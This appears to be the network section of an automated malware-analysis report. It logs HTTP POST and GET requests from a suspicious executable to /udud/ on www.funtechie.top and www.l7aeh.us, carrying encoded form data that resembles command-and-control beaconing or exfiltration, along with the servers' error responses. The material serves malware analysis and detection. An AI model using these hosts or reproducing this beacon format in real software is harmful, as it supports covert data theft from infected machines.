                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 43 75 6d 37 43 4d 7a 76 4d 54 35 73 62 6b 78 53 59 68 66 31 70 55 61 56 69 55 44 53 37 52 70 70 6b 72 32 38 30 62 78 47 57 2f 32 4f 64 4d 4f 4a 76 6d 78 64 64 46 71 36 4f 58 52 6e 6d 56 73 61 6d 50 72 4f 4a 72 50 6e 36 6c 48 6a 46 68 49 67 50 79 34 5a 73 37 66 77 4c 2f 45 52 33 4c 61 51 58 59 66 75 43 53 5a 64 4b 65 6f 65 36 6b 79 41 4d 37 45 4b 2b 45 46 79 7a 41 4e 48 46 32 43 68 49 76 70 71 36 70 4b 36 45 4f 37 7a 58 61 61 78 4a 78 52 49 68 4c 68 38 53 50 30 7a 48 58 73 4d 59 79 56 64 50 41 4f 57 4d 4b 48 36 4c 77 35 6f 34 66 67 49 4b 49 67 6f 74 74 4b 37 30 6d 37 55 63 62 48 72 4f 70 66 41 6c 48 6a 65 45 79 34 44 4f 39 33 44 4c 6f 59 3d
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/2OdMOJvmxddFq6OXRnmVsamPrOJrPn6lHjFhIgPy4Zs7fwL/ER3LaQXYfuCSZdKeoe6kyAM7EK+EFyzANHF2ChIvpq6pK6EO7zXaaxJxRIhLh8SP0zHXsMYyVdPAOWMKH6Lw5o4fgIKIgottK70m7UcbHrOpfAlHjeEy4DO93DLoY=
                                                                                                May 27, 2024 12:32:26.624151945 CEST533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:26 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.11.3049845203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:29.143093109 CEST1679OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 43 75 6d 37 43 4d 7a 76 4d 54 35 73 62 6b 78 53 59 68 66 31 70 55 61 56 69 55 44 53 37 52 70 70 6b 72 32 38 30 62 78 47 57 2f 2b 4f 64 35 43 4a 39 33 78 64 50 56 71 36 51 48 52 6d 6d 56 73 39 6d 50 69 48 4a 72 7a 52 36 6e 50 6a 46 43 51 67 45 6a 34 5a 37 72 66 77 44 66 45 55 39 72 61 46 58 59 50 71 43 54 6c 64 4b 65 6f 65 36 6e 71 41 4b 75 6f 4b 34 45 46 7a 30 41 4e 54 55 6d 43 4a 49 76 67 52 36 70 50 59 48 39 7a 7a 55 37 71 78 4b 48 6c 49 67 72 68 2b 56 50 30 52 48 57 52 4f 59 79 4a 37 50 42 71 38 4d 4b 2f 36 49 45 30 6f 6e 73 45 38 5a 71 30 6e 6d 76 32 51 6a 45 4c 6b 65 70 44 35 42 70 44 6a 79 55 32 7a 61 57 78 59 57 34 65 45 56 74 36 4e 37 54 4f 4b 4a 50 61 4c 72 38 2f 59 42 6a 56 68 69 4c 6c 42 49 44 73 45 36 37 6f 7a 6e 4f 77 54 32 4e 76 4f 48 48 78 53 54 55 46 65 39 72 55 67 56 4b 77 72 75 69 57 43 6f 47 56 36 55 71 54 56 31 6f 76 43 4b 30 39 4b 6c 6c 4c 4b 58 72 62 75 62 52 77 6f 66 65 62 73 79 47 59 6c 53 44 69 51 4b 6a 6f 4e 65 30 75 46 79 47 53 57 6e 6d 51 6b 69 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/+Od5CJ93xdPVq6QHRmmVs9mPiHJrzR6nPjFCQgEj4Z7rfwDfEU9raFXYPqCTldKeoe6nqAKuoK4EFz0ANTUmCJIvgR6pPYH9zzU7qxKHlIgrh+VP0RHWROYyJ7PBq8MK/6IE0onsE8Zq0nmv2QjELkepD5BpDjyU2zaWxYW4eEVt6N7TOKJPaLr8/YBjVhiLlBIDsE67oznOwT2NvOHHxSTUFe9rUgVKwruiWCoGV6UqTV1ovCK09KllLKXrbubRwofebsyGYlSDiQKjoNe0uFyGSWnmQkiySDijCFwfzIpya5hdz52Bl5yHDngIzGFlVPG6x2UoCHL8gRF79RBEQcyEzS1li3EFj/Jo4m18U06opwRBRaQvPD1jUV7E43U25ivyANWKYlTFdjeY3nEnUA/D3cXlDIKOqciYsuzGw7nVpX6sML+pu8eyqqOnqWGdBGVq2gSO6o1T2TcAc3T7If/zODpPTi9qf7sg+qahdiYwbbu17z1sd6fVF2UmrKnopujO0ACQb/fKo0Ops7KO+cR4CVdBvrvjimndtfgiFZT25CPMMEDvRg6Ufn48jIm36cyHWwfFohqgHDKcakBjUwjjCNZG1DK/S/3xCVQdk+slrgI6B6vPDRFN1Ar76bH4XsLT6Jqr5OchtE+G6JN9Up9lVwoLPiFaR3Qzy9shpRjeZv4Uw6DJfSrolrMAQ7Wi/xBAcyhdb2BasOVQoMP145EwBxJNZWYAwuAWr5hVSJWGsdC/XIw7LmlMXAtMotaKRAqmcevnHdHovChzApfgWb0JxiDZifOAphGeXFmXnnTJ61Y4LsiNr6pBfc7syt2Tc+NRCg4N53T4MEGFDn0USCfhcelDyVYBYYrMErTi/aSmFlx+DUZ2Whcnczot2PAgsnf9mo9eBja2jWafQ0b6s3KYYfhh89h1Mndkstw62hlYkOCLB0qbgvaCqjh++4W0C [TRUNCATED]
                                                                                                May 27, 2024 12:32:29.322004080 CEST533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:29 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.11.3049846203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:31.832165956 CEST478OUTGET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:32:32.006409883 CEST548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:32:31 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.11.304984791.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:37.370162964 CEST727OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6b 6e 57 47 39 6c 67 7a 50 58 46 4a 62 51 52 49 77 2f 6a 32 6e 36 4e 5a 33 42 4a 55 39 56 77 51 45 53 78 4c 62 74 2b 6d 57 38 67 68 33 32 53 63 72 61 32 4f 6e 61 4b 75 45 68 32 63 77 69 36 66 50 41 6e 68 33 67 32 6a 6c 58 64 6c 6e 31 6f 2b 35 4c 59 54 55 32 39 4f 46 6d 72 50 79 4a 61 79 31 38 7a 42 73 44 79 37 67 45 4d 7a 59 47 56 6e 54 70 52 66 6e 73 59 51 42 6c 50 6c 72 76 45 36 66 77 46 48 49 50 37 73 77 64 37 7a 62 77 55 73 4f 53 6f 7a 77 2f 68 77 63 68 75 73 2f 6f 41 38 59 53 4d 37 4a 46 39 2b 38 50 67 58 4f 6e 72 6b 2f 53 70 6e 5a 48 57 4e 76 2b 62 4c 4d 76 6f 72 31 67 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJbQRIw/j2n6NZ3BJU9VwQESxLbt+mW8gh32Scra2OnaKuEh2cwi6fPAnh3g2jlXdln1o+5LYTU29OFmrPyJay18zBsDy7gEMzYGVnTpRfnsYQBlPlrvE6fwFHIP7swd7zbwUsOSozw/hwchus/oA8YSM7JF9+8PgXOnrk/SpnZHWNv+bLMvor1g==
                                                                                                May 27, 2024 12:32:37.560364962 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:32:37 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.11.304984891.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:40.090612888 CEST747OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6b 6e 57 47 39 6c 67 7a 50 58 46 4a 4b 41 68 49 79 63 62 32 68 61 4e 61 72 52 4a 55 6f 6c 77 55 45 53 39 4c 62 73 4b 32 58 4f 55 68 33 53 57 63 71 66 4b 4f 72 36 4b 75 51 78 32 5a 39 43 37 54 50 41 37 70 33 6c 32 6a 6c 58 4a 6c 6e 78 73 2b 35 34 77 51 56 6d 39 4d 49 47 72 4a 76 35 61 79 31 38 7a 42 73 48 61 52 67 45 45 7a 5a 32 46 6e 51 4c 35 63 35 63 59 54 4a 46 50 6c 76 76 45 2b 66 77 46 31 49 4f 58 53 77 66 44 7a 62 31 77 73 4f 44 6f 38 2b 2f 68 79 44 78 76 50 78 5a 6f 77 42 42 59 47 46 45 4a 35 35 65 74 79 43 51 61 2b 69 52 64 6c 4b 6e 71 67 7a 2f 32 6a 4f 74 70 77 6f 67 39 6e 34 56 78 47 4a 6d 59 49 48 6a 4c 4d 36 63 6c 61 73 72 45 3d
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJKAhIycb2haNarRJUolwUES9LbsK2XOUh3SWcqfKOr6KuQx2Z9C7TPA7p3l2jlXJlnxs+54wQVm9MIGrJv5ay18zBsHaRgEEzZ2FnQL5c5cYTJFPlvvE+fwF1IOXSwfDzb1wsODo8+/hyDxvPxZowBBYGFEJ55etyCQa+iRdlKnqgz/2jOtpwog9n4VxGJmYIHjLM6clasrE=
                                                                                                May 27, 2024 12:32:40.280853987 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:32:40 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.11.304984991.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:42.807821035 CEST1664OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6b 6e 57 47 39 6c 67 7a 50 58 46 4a 4b 41 68 49 79 63 62 32 68 61 4e 61 72 52 4a 55 6f 6c 77 55 45 53 39 4c 62 73 4b 32 58 4f 73 68 30 68 65 63 71 38 69 4f 71 36 4b 75 50 42 32 59 39 43 36 4a 50 41 7a 74 33 6c 79 4a 6c 52 46 6c 68 55 34 2b 78 74 4d 51 63 6d 39 4d 55 32 72 4d 79 4a 62 71 31 34 76 46 73 44 2b 52 67 45 45 7a 5a 77 4a 6e 45 4a 52 63 37 63 59 51 42 6c 50 70 72 76 45 57 66 78 73 41 49 4f 6a 43 77 72 2f 7a 59 56 67 73 4a 78 41 38 32 2f 68 30 41 78 76 70 78 5a 31 75 42 42 55 77 46 48 56 54 35 63 39 79 53 47 58 49 35 54 55 2f 58 33 61 52 78 65 32 46 47 65 59 6c 70 54 78 72 7a 47 74 6a 4a 6e 30 34 4a 6a 2b 53 72 4e 4a 6a 75 4f 45 36 4d 36 57 45 7a 51 34 38 56 39 48 66 73 6b 4c 6d 79 73 34 74 43 66 79 7a 47 66 52 6a 59 66 61 77 56 31 2f 55 2f 66 71 30 2b 66 49 45 44 71 4e 4f 75 4e 4b 75 2b 66 4a 71 4e 4e 61 4d 6b 52 58 59 4d 31 4e 62 56 6e 61 65 41 68 49 4f 2b 5a 34 4c 54 30 4c 4c 67 51 4c 4b 46 68 65 4a 73 69 70 51 56 45 58 4f 31 74 68 37 35 79 6d 67 37 6c 4b 33 53 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJKAhIycb2haNarRJUolwUES9LbsK2XOsh0hecq8iOq6KuPB2Y9C6JPAzt3lyJlRFlhU4+xtMQcm9MU2rMyJbq14vFsD+RgEEzZwJnEJRc7cYQBlPprvEWfxsAIOjCwr/zYVgsJxA82/h0AxvpxZ1uBBUwFHVT5c9ySGXI5TU/X3aRxe2FGeYlpTxrzGtjJn04Jj+SrNJjuOE6M6WEzQ48V9HfskLmys4tCfyzGfRjYfawV1/U/fq0+fIEDqNOuNKu+fJqNNaMkRXYM1NbVnaeAhIO+Z4LT0LLgQLKFheJsipQVEXO1th75ymg7lK3SV6+/9RYOlO4fdoWcSoSiQtjcuVPC0qOlbxYYhQwQD3zeCjvgr0HeTRxivG2Tt9r45/p7uIowu4ovjYZmlIs+SexlcFcZE1kihbVsivvDGqi2vN+8AspRPzwz1v/opviDsEjKOoNhhdIXmwUB8KQgb0/eY+Jf/knnidKSoqfB1y2pjSdCIMqlnbM7wb94M5vmV0u4wKRafHJ0veDufpUCtQWHjD7bhaZUsBkU213i/HmSZKxbtHIsaT7XTqP0b+r0CvcctUQ+EarYFBhL1u47+6Vx0pyyhSK07aeuz5s1VIY8GcH9lTHgWUz19CAzm8QZiFgFAYAp7ybc1qG6CnJuOVzwo0H5iX3zi9uM35EuXfMovpNS1LW7Hz9HKJ9py+I/UtEXmEueumbVxjYVC7wwKZGIQWgCT6INoUkGsNDAPjy7lBQIGIDTwk+Wba7E+tPQbCZxt9pTK4bXD2JXYMeAwKz7gSD7m0DE+X6bqYuASPgRFF9iD4MlcS+67H6kpjaiqD50vkGKyAj6j320QD+XwmpxWFv0OfsccpKWtM11Z3uDEHPpj7FrWIiMVY8PR2638xeKvY1jiFBBG/8B2IfzVnl0hekUSyIMbfjZhDCrWcagIIjgVRWfs7MZ3+ucy45McAr5khwzS8tqOL6s/IRj7E2bxOSTxEP8rT [TRUNCATED]
                                                                                                May 27, 2024 12:32:42.997834921 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:32:42 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
